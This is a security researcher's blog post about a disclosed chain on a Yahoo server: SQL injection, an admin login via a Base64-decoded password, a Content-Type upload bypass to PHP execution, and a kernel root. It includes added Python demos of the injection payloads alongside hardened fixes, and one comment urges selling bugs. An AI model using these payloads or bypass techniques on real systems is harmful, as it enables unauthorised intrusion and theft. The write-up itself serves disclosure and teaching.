Yahoo SQL Injection to Remote Code Execution to Root Privilege.


Hello from Egypt :D

Today I will blog about a SQL Injection vulnerability that I escalated to Remote Code Execution, and from there to root privileges, on one of Yahoo's servers.

The story started while I was looking at the domain below: http://innovationjockeys.yahoo.net/

While intercepting POST requests, I found the request below, which grabbed my attention as a possible SQL Injection point.

http://innovationjockeys.yahoo.net/tictac_chk_req.php
POST:
f_id=9631

I started with some manual checks, and it looked like a SQL injection was sitting right there!
Running sqlmap against it, I got the PoC below as confirmation of the vulnerability:

http://innovationjockeys.yahoo.net/tictac_chk_req.php
POST:
f_id=-9631' OR (2777=2777)#

Available Databases:
[*] information_schema
[*] innovation******* #Hiding dbnames for Yahoo privacy.
[*] web****

Good, now I have a SQL injection and I can read data through it as well.

Next: find the admin panel, extract the administrator's username and password, log in to the admin panel, and look for a way to turn that into RCE!

1- Admin panel found on: http://innovationjockeys.yahoo.net/admin/

2- I found the administrator password stored in the database, and it was merely Base64-encoded (an encoding, not a hash, so it decodes straight back) :D

[Screenshot: Base64-encoded administrator password extracted from the database]

Good, I decoded the administrator password and logged in to the admin panel.
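As an added example (not code from the original post or from the Yahoo application), here are the steps above reconstructed in Python against an in-memory SQLite database: a handler that builds its query by string concatenation the way tictac_chk_req.php evidently did, the boolean-based true/false check that sqlmap's `-9631' OR (2777=2777)#` payload relies on, a UNION query that pulls the Base64-"protected" admin password and decodes it, and the parameterised handler that stops all of it. The schema, table and column names, and the password are constructed for the example; the real ones are not on the page. sqlmap's payload ended with MySQL's `#` comment, which SQLite does not understand, so the payloads below end with `-- -` (accepted by both).

```python
import base64
import sqlite3

# Payloads in the shape sqlmap used (-9631' OR (2777=2777)#), with the MySQL
# '#' line comment swapped for '-- -' so the same string works in SQLite too.
TRUE_PAYLOAD = "-9631' OR (2777=2777)-- -"
FALSE_PAYLOAD = "-9631' OR (2777=2778)-- -"
UNION_PAYLOAD = "-9631' UNION SELECT username, password FROM admin-- -"


def build_db() -> sqlite3.Connection:
    """Constructed sample data, not the target's schema: a requests table
    looked up by f_id, and an admin table whose password is stored as
    Base64, as the post describes finding on the target."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE requests (f_id TEXT, status TEXT);
        INSERT INTO requests VALUES ('9631', 'pending'), ('9632', 'approved');
        CREATE TABLE admin (username TEXT, password TEXT);
        """
    )
    encoded = base64.b64encode(b"Passw0rd!2014").decode()  # constructed value
    conn.execute("INSERT INTO admin VALUES (?, ?)", ("admin", encoded))
    return conn


def check_request_vulnerable(conn: sqlite3.Connection, f_id: str) -> list:
    """String concatenation: the request value becomes part of the SQL text.
    (Assumed reconstruction of the pattern; the PHP source is not on the page.)"""
    sql = f"SELECT f_id, status FROM requests WHERE f_id='{f_id}'"
    return conn.execute(sql).fetchall()


def check_request_safe(conn: sqlite3.Connection, f_id: str) -> list:
    """Parameterised query: the value is bound by the driver and can never
    change the structure of the statement."""
    sql = "SELECT f_id, status FROM requests WHERE f_id=?"
    return conn.execute(sql, (f_id,)).fetchall()


def confirm_boolean_sqli(conn: sqlite3.Connection, handler) -> bool:
    """Boolean-based check: if a TRUE condition and a FALSE condition give
    different results, our input is being evaluated as SQL."""
    return handler(conn, TRUE_PAYLOAD) != handler(conn, FALSE_PAYLOAD)


def dump_admin_password(conn: sqlite3.Connection) -> str:
    """Through the vulnerable handler, a UNION with a matching column count
    returns rows from another table. Base64 is an encoding, not a hash, so
    the stored 'password' decodes straight back to plaintext."""
    rows = check_request_vulnerable(conn, UNION_PAYLOAD)
    _username, encoded = rows[0]
    return base64.b64decode(encoded).decode()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler injectable:", confirm_boolean_sqli(db, check_request_vulnerable))
    print("safe handler injectable:      ", confirm_boolean_sqli(db, check_request_safe))
    print("admin password via UNION:     ", dump_admin_password(db))
```

The same two payloads sent to the parameterised handler both return nothing, because the driver looks for a row whose f_id literally equals the payload string; that identical-response behaviour is exactly what sqlmap's boolean test would report as "not injectable".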

Hey Admin Panel! Say Hello to my readers :-)

[Screenshot: the admin panel after login]

The next step was to find a place to upload files so I could turn the admin access into Remote Code Execution!

I found an upload page, but after uploading a file whose content was a phpinfo(); call,
I saw that my uploaded file had been saved as: page_d03b042780c5071521366edc01e52d3d.xrds+xml

instead of page_d03b042780c5071521366edc01e52d3d.php ?!

Hmmm. I intercepted the upload request to find out why, and saw the following:

[Screenshot: the intercepted upload request, 2014-09-05 05:59:33]

Yes, now the reason is clear: it's the Content-Type header! The server was apparently taking the stored file's extension from the request's Content-Type (application/xrds+xml became .xrds+xml), a value that is entirely under the client's control.

I sent the same request again, this time with the Content-Type header changed to application/php instead, and here we go :D
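As an added example (not the site's code), here is a Python sketch of why changing Content-Type to application/php worked, and what the upload handler should have done instead. naive_extension reconstructs the behaviour observed above: the stored extension is the MIME subtype of the client-supplied Content-Type (application/xrds+xml gave .xrds+xml, application/php gave .php); the real server code is not on the page, so that reconstruction is an assumption. safe_extension ignores Content-Type entirely and validates the file against an allowlist of extensions and the magic bytes each must start with; the allowlist and all sample inputs are constructed for the example.

```python
import os
import secrets

# Allowlist of storable types: extension -> magic bytes the body must start
# with. Constructed for this example; a real deployment tailors it.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def naive_extension(content_type: str) -> str:
    """Extension chosen the way the target evidently did: from the subtype
    of the client-supplied Content-Type header. The header is attacker
    input, so 'application/php' yields 'php'. (Assumed reconstruction.)"""
    subtype = content_type.split("/", 1)[1]
    return subtype.split(";", 1)[0].strip().lower()


def safe_extension(filename: str, content_type: str, body: bytes) -> str:
    """Hardened version: Content-Type is ignored. The extension must come
    from the allowlist (taken from the LAST dot, so shell.png.php is 'php')
    and the body must carry that type's magic bytes, so neither the header
    nor the filename can smuggle a .php onto disk."""
    del content_type  # deliberately unused: client-controlled, untrusted
    base = os.path.basename(filename)
    if "." not in base:
        raise ValueError("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext == "jpeg":
        ext = "jpg"
    magic = ALLOWED.get(ext)
    if magic is None:
        raise ValueError(f"extension not allowed: {ext}")
    if not body.startswith(magic):
        raise ValueError("file content does not match its extension")
    return ext


def is_rejected(filename: str, content_type: str, body: bytes) -> bool:
    """True if the hardened check refuses this upload."""
    try:
        safe_extension(filename, content_type, body)
    except ValueError:
        return True
    return False


def stored_name(filename: str, content_type: str, body: bytes) -> str:
    """Server-chosen name: a random token plus the validated extension.
    Nothing from the request reaches the filesystem path."""
    ext = safe_extension(filename, content_type, body)
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    php = b"<?php phpinfo(); ?>"
    print("naive, as uploaded:  ", naive_extension("application/xrds+xml"))
    print("naive, header changed:", naive_extension("application/php"))
    print("safe, header changed: rejected =", is_rejected("shell.php", "application/php", php))
    print("safe, real PNG:      ", stored_name("logo.png", "application/php", ALLOWED["png"] + b"\x00"))
```

The remaining controls belong outside this function: store uploads outside the web root, or on a host that will not execute them, serve them back with a fixed Content-Type and a Content-Disposition header, and never let the request choose the filename.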

[Screenshot: phpinfo() output served from the uploaded .php file]

Now I had both the SQLi and the RCE; the last part remaining was root access on the server.

The server's kernel had last been updated in 2012, which gave me the opportunity to root it with a local root exploit for that unpatched kernel!

[Screenshot: root shell on the server]

Time-line:

2014-09-05 Initial report to Yahoo

2014-09-06 Yahoo confirmed the vulnerability

2014-09-07 Yahoo Fixed the Vulnerability

2014-09-19 Yahoo informed me that this vulnerability is not eligible for a reward!!!

Note: I find it very strange that Yahoo did not pay a bounty for such a critical bug even if it fell outside the scope. Yahoo pays for critical vulnerabilities in out-of-scope domains; if a SQLi to RCE to root privilege is not a critical bug, then what could be?!

You can follow me @ Twitter.com/zigoo0


11 Comments

  1. Eslam Medhat - September 20, 2014

    They’re so stupid !!!
    But great job keep it up.

  2. Mazen Gamal - September 20, 2014

    Nice Catch Ya Hima ^_^

  3. Fabio - September 20, 2014

    Very great work! This makes me think about why to participate in a bug bounty program… W ethical hackers!

  4. Nabil - September 20, 2014

    Congratulations on your discovery, but I wonder: isn't it illegal to probe a website looking for vulnerabilities, and even crack their encoded password and log in to the admin panel? Did you have written permission from Yahoo? If not, then how do you do it without being prosecuted?

  5. Mohammed Gad - September 21, 2014

    Great work!!! Bro, but why does Yahoo always make the bug bounty difficult for you!! The first time you found them 2 vulnerabilities and they gave you $250, and now you got to SQLi and RCE and then got root and there's no reward :D !!!!
    I think staying away from Yahoo is better if they are going to carry on like this!

  6. ITsecurity Daily News: 09/22/2014 | ITsecurityITsecurity - September 22, 2014

    […] Yahoo SQL Injection to Remote Code Execution to Root Privilege   Yahoo still hasn’t quite got the hang of this bounty concept. The firm started, just about a year ago, by offering a tee-shirt. Then it announced it would introduce a proper scheme with bounties starting at $150; but in reality reduced it to $50. On Friday, Egyptian researcher Ebrahim Hegazy blogged about a SQLi flaw he had found (and reported) in a Yahoo service. Yahoo declined to offer a bounty, telling Hegazy it wasn’t eligible for a reward. “I find it very strange that Yahoo did not pay a bounty for such Critical bug even if it fall outside the scope, Yahoo pays for Critical vulnerabilities in Out of Scope domains, if a SQLI to RCE to Root Privilege is not a Critical bug, then what could be?!” The danger in such an attitude from Yahoo is that researchers who find such critical bugs might decide to sell them elsewhere. Security Down: http://www.sec-down.com/wordpress/?p=494 […]

  7. S0me0n3 - October 1, 2014

    Dude, seriously, with that experience consider going black hat. No one gives a f#$ck, that's what I found out. If the bounties aren't giving it, you could make a fortune.

  8. upload - February 19, 2015

    Thanks for finally talking about >Yahoo SQL Injection to Remote Code Execution to Root Privilege. | Security Down! <Liked it!
